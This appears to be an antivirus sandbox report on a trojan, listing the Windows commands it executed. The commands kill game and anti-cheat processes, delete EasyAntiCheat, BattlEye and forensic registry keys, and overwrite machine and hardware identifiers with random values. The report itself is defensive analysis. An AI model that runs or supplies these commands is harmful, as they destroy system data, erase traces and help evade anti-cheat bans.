Trojan.KillFiles2.2802

Technical Information

Malicious functions

Executes the following

'<SYSTEM32>\taskkill.exe' /f /im EpicGamesLauncher.exe
'<SYSTEM32>\taskkill.exe' /f /im FortniteClient-Win64-Shipping.exe
'<SYSTEM32>\taskkill.exe' /f /im OneDrive.exe
'<SYSTEM32>\taskkill.exe' /f /im RustClient.exe
'<SYSTEM32>\taskkill.exe' /f /im Origin.exe
'<SYSTEM32>\taskkill.exe' /f /im r5apex.exe

Launches a large number of processes

Modifies file system

Creates the following files

Deletes the following files

<SYSTEM32>\catroot2\dberr.txt
<SYSTEM32>\restore\machineguid.txt
%WINDIR%\inf\keyboard.pnf
%WINDIR%\inf\netrasa.pnf
%WINDIR%\inf\netavpna.pnf

Miscellaneous

Searches for the following windows

ClassName: '' WindowName: ''

Executes the following

'<SYSTEM32>\cmd.exe' /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
'<SYSTEM32>\cmd.exe' /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
'<SYSTEM32>\reg.exe' delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
'<SYSTEM32>\cmd.exe' /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
'<SYSTEM32>\reg.exe' delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKCU\Software\Classes\Interface /v ClsidStore /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
'<SYSTEM32>\reg.exe' ADD HKCU\Software\Classes\Interface /v ClsidStore /t REG_BINARY /d 140551004320032925027525323814093266711375156903047929800 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d Apple-14059-20792-1986720545 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d Apple-14059-20792-1986720545 /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d Apple-14026-11612-50659288 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
'<SYSTEM32>\cmd.exe' /c reg delete HKCU\Software\Classes\Interface /v ClsidStore /f
'<SYSTEM32>\reg.exe' delete HKCU\Software\Classes\Interface /v ClsidStore /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v _DriverProviderInfo /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v _DriverProviderInfo /t REG_SZ /d Apple-14065-9520-228273136 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d Apple-14068-20269-792327199 /f
'<SYSTEM32>\cmd.exe' /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SettingsRequests /f
'<SYSTEM32>\reg.exe' delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SettingsRequests /f
'<SYSTEM32>\cmd.exe' /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v BackupProductKeyDefault /f
'<SYSTEM32>\reg.exe' delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v BackupProductKeyDefault /f
'<SYSTEM32>\cmd.exe' /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
'<SYSTEM32>\reg.exe' delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
'<SYSTEM32>\reg.exe' delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
'<SYSTEM32>\cmd.exe' /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
'<SYSTEM32>\reg.exe' delete HKCU\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\com.epicgames.launcher /f
'<SYSTEM32>\cmd.exe' /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
'<SYSTEM32>\reg.exe' delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
'<SYSTEM32>\cmd.exe' /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
'<SYSTEM32>\reg.exe' delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
'<SYSTEM32>\cmd.exe' /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
'<SYSTEM32>\reg.exe' delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
'<SYSTEM32>\cmd.exe' /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\LastEnum /f
'<SYSTEM32>\reg.exe' delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\LastEnum /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d Apple-14026-11612-50659288 /f
'<SYSTEM32>\cmd.exe' /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v actionlist /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d Apple-14062-31540-496311840 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Apple-14029-22360-22929583 /f
'<SYSTEM32>\cmd.exe' /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
'<SYSTEM32>\reg.exe' delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d Apple-14032-340-802624646 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d Apple-14036-11089-2589015942 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d Apple-14036-11089-2589015942 /f
'<SYSTEM32>\cmd.exe' /c reg delete HKCU\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\com.epicgames.launcher /f
'<SYSTEM32>\reg.exe' delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
'<SYSTEM32>\reg.exe' delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v actionlist /f
'<SYSTEM32>\cmd.exe' /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
'<SYSTEM32>\reg.exe' delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKCU\Software\Classes\Installer\Dependencies /v MSICache /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
'<SYSTEM32>\reg.exe' ADD HKCU\Software\Classes\Installer\Dependencies /v MSICache /t REG_BINARY /d 14104742978212975118403257461801215530320491177328260 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TPM\WMI /v WindowsAIKHash /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Services\TPM\WMI /v WindowsAIKHash /t REG_BINARY /d 141047429782129751184032574618012155303204911773 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientIdValidation /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random...
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientIdValidation /t REG_BINARY /d 14107181782568621047287182967321125126021579256252811230505 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKCU\SYSTEM\CurrentControlSet\Services\TPM\ODUID /v RandomSeed /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
'<SYSTEM32>\reg.exe' ADD HKCU\SYSTEM\CurrentControlSet\Services\TPM\ODUID /v RandomSeed /t REG_BINARY /d 14107181782568621047287182967321125126021579256252811230505 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SOFTWARE\Microsoft\Internet" "Explorer\Migration /v IE" "Installed" "Date /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Internet" "Explorer\Migration /v IE" "Installed" "Date /t REG_BINARY /d 14111289261078212342626483224237967532304 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random% /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random% /f
'<SYSTEM32>\cmd.exe' /c reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t REG_BINARY /d 14114690728646363716579475927350674816048 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d %random%%random%%random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d 141171765513742 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d %random%%random%%random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d 141171765513742 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d %random%%random%%random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d 141212840331606 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SevilleEventlogManager /v LastEventlogWrittenTime /t REG_QWORD /d %random%%random%%random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SevilleEventlogManager /v LastEventlogWrittenTime /t REG_QWORD /d 14124638416702 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\System\CurrentControlSet\Control\Notifications /v 418A073AA3BC8075 /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%rand...
'<SYSTEM32>\reg.exe' ADD HKLM\System\CurrentControlSet\Control\Notifications /v 418A073AA3BC8075 /t REG_BINARY /d 141246384167021029114755165393919307344676522737330725 /f
'<SYSTEM32>\reg.exe' ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d 1410129449227255688808921820149001845715537179212840830417 /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d 14088-19223-16805-7739 /f
'<SYSTEM32>\reg.exe' delete HKCU\Software\Hex-Rays\IDA\History64 /f
'<SYSTEM32>\cmd.exe' /c reg ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d %random%-%random%-%random%-%random% /f
'<SYSTEM32>\cmd.exe' /c reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist /f
'<SYSTEM32>\reg.exe' delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist /f
'<SYSTEM32>\cmd.exe' /c reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Count /f
'<SYSTEM32>\reg.exe' delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Count /f
'<SYSTEM32>\cmd.exe' /c reg ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion /v BuildGUID /t REG_SZ /d %random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion /v BuildGUID /t REG_SZ /d 14081 /f
'<SYSTEM32>\cmd.exe' /c reg ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion /v RegisteredOwner /t REG_SZ /d %random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion /v RegisteredOwner /t REG_SZ /d 14081 /f
'<SYSTEM32>\cmd.exe' /c reg ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion /v RegisteredOrganization /t REG_SZ /d %random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion /v RegisteredOrganization /t REG_SZ /d 14085 /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d 14085-8475-31708-16443 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Kernel-EventTracing/Admin /v OwningPublisher /t REG_SZ /d {%random%-%random%-%random%%random%} /f
'<SYSTEM32>\reg.exe' delete HKCU\Software\Hex-Rays\IDA\History /f
'<SYSTEM32>\cmd.exe' /c reg ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion /v ProductId /t REG_SZ /d %random%-%random%-%random%-%random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion /v ProductId /t REG_SZ /d 14088-19223-16805-7739 /f
'<SYSTEM32>\cmd.exe' /c reg ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion /v InstallDate /t REG_SZ /d %random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion /v InstallDate /t REG_SZ /d 14091 /f
'<SYSTEM32>\cmd.exe' /c reg ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {%random%-%random%-%random%-%random%} /f
'<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {14091-29972-1901-31802} /f
'<SYSTEM32>\cmd.exe' /c reg ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d %random%-%random%-%random%-%username%%random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d 14094-7952-19765-user23097 /f
'<SYSTEM32>\cmd.exe' /c reg ADD HKCR\Local Settings\Software\Microsoft\Windows\Shell\MuiCache /f
'<SYSTEM32>\reg.exe' ADD HKCR\Local Settings\Software\Microsoft\Windows\Shell\MuiCache /f
'<SYSTEM32>\cmd.exe' /c reg delete HKCU\Software\Hex-Rays\IDA\History /f
'<SYSTEM32>\cmd.exe' /c reg delete HKCU\Software\Hex-Rays\IDA\History64 /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t REG_BINARY /d 14114690728646363716579475927350674816048 /f
'<SYSTEM32>\reg.exe' delete HKLM\SYSTEM\MountedDevices /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {Apple%random%-%random%-%random%-%random%} /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Apple13957-15271-23134-28246 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d {Apple-%random%-%random} /f
'<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d {Apple-13961-%random} /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SYSTEM\HardwareConfig\Current /v BaseBoardProduct /t REG_SZ /d Apple-%random%%random%%random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\HardwareConfig\Current /v BaseBoardProduct /t REG_SZ /d Apple-13961260198230 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d Apple-%random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d Apple-13961 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d Apple-%random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d Apple-13964 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\BIOS /v BaseBoardProduct /t REG_SZ /d Apple-%random%%random%%random% /f
'<SYSTEM32>\cmd.exe' /c reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
'<SYSTEM32>\reg.exe' ADD HKLM\HARDWARE\DESCRIPTION\System\BIOS /v BaseBoardProduct /t REG_SZ /d Apple-13964400026094 /f
'<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Apple-13967-14748-111902132} /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f
'<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Apple-13967-14748-111902132} /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f
'<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d {Apple-13970-25497-2905426195} /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d Apple-13970-25497-2905426195 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d Apple-13970-25497-2905426195 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLab /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d DESKTOP-13957 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Apple%random%-%random%-%random%-%random% /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d DESKTOP-%random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d DESKTOP-13954 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d DESKTOP-%random% /f
'<SYSTEM32>\cmd.exe' /c taskkill /f /im OneDrive.exe >nul 2>&1
'<SYSTEM32>\cmd.exe' /c taskkill /f /im RustClient.exe >nul 2>&1
'<SYSTEM32>\cmd.exe' /c taskkill /f /im Origin.exe >nul 2>&1
'<SYSTEM32>\cmd.exe' /c taskkill /f /im r5apex.exe >nul 2>&1
'<SYSTEM32>\cmd.exe' /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Temp
'<SYSTEM32>\cmd.exe' /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\EasyAntiCheat
'<SYSTEM32>\cmd.exe' /c taskkill /f /im EpicGamesLauncher.exe
'<SYSTEM32>\cmd.exe' /c taskkill /f /im FortniteClient-Win64-Shipping.exe
'<SYSTEM32>\cmd.exe' /c taskkill /f /im OneDrive.exe
'<SYSTEM32>\cmd.exe' /c reg delete HKLM\SOFTWARE\WOW6432Node\EasyAntiCheat /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLab /t REG_SZ /d Apple-13974-3477-1415117491 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f
'<SYSTEM32>\reg.exe' delete HKLM\SOFTWARE\WOW6432Node\EasyAntiCheat /f
'<SYSTEM32>\cmd.exe' /c reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f
'<SYSTEM32>\reg.exe' delete HKLM\SYSTEM\ControlSet001\Services\BEService /f
'<SYSTEM32>\cmd.exe' /c reg delete HKLM\System\CurrentControlSet\Control\TimeZoneInformation /f
'<SYSTEM32>\reg.exe' delete HKLM\System\CurrentControlSet\Control\TimeZoneInformation /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SOFTWAREMicrosoft\Windows" "NT\CurrentVersion\Notifications\Data /v 418A073AA3BC3475 /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%ra...
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWAREMicrosoft\Windows" "NT\CurrentVersion\Notifications\Data /v 418A073AA3BC3475 /t REG_BINARY /d 1395126542201731288825138503027992203996685820244428391 /f
'<SYSTEM32>\cmd.exe' /c reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
'<SYSTEM32>\reg.exe' delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
'<SYSTEM32>\reg.exe' ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d 13954452352694183268589575911191122618032440229628435 /f
'<SYSTEM32>\cmd.exe' /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
'<SYSTEM32>\reg.exe' delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Apple-13974-3477-1415117491 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d 13993-2431-23032-30799 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d Apple%random%-%random%-%random%-%random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d Apple13996-13180-8128-22094 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t REG_SZ /d Apple%random%-%random%-%random%-%random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t REG_SZ /d Apple13996-13180-8128-22094 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_SZ /d Apple%random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_SZ /d Apple14000 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_SZ /d %random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_SZ /d 14000 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLabEx /t REG_SZ /d %random% /f
